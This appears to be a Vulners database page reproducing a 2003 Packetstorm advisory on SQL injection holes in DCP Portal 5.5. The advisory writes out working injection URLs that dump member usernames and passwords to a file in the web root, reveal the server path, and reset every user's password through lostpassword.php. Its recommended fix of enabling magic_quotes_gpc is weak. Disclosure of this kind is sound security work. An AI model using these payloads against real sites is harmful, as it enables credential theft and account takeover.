Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

dcpportal.txt

🗓️ 01 Oct 2003 00:00:00Reported by Lifo FifoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

DCP Portal has multiple security holes; disable magic quotes, register globals for safety.

Code
`From: Lifo Fifo <[email protected]>  
To: [email protected]  
Subject: DCP Portal - 5.5 holes  
  
  
  
Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you have turned off register_globals.  
  
All the files in the product, dont check for integrity of variables. You can easily exploit this using some SQL Injection techniques. For example, if you want to get username/password of all the users, you can exploit advertiser.php.   
  
Open it like,  
  
http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt  
  
This is for windows, if web-server is running on *nix, then you could enter something like,  
  
http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt  
  
In this cases, you will need to enter the absolute path. For that, run the follwing  
  
http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that will show the path to the sever if they have turned on display_errors in php.ini.  
  
That's all ! Notice that here we are using UNION function in query. For that, the host should be running version MySQL 4.x. Well, if it's not running 4.x, No problem, we have another file !  
  
This time it's lostpassword.php.  
  
Open it like,  
  
http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'  
  
This will really cause some damage. It will reset password of everyone. Everyone will get as many mails as the number of users. And evryone's password will be the one provided in the last email.  
  
I didn't have time to check if there was injection possible with some numeric field. If it's there, one can launch select-fish attacks, which would work even in case of magic_quotes_gpc is on.  
  
Fix : Insteading of fixing it, simply turn on magic_quotes_gpc. Otherwise it will take you as much time as they took in making DCP Portal.  
  
-lifofifo  
http://www.hackingzone.org/  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Oct 2003 00:00Current
7.4High risk
Vulners AI Score7.4
dcp portal security holessql injection techniquesexploit examplespassword reset vulnerabilityintegrity check failure.
27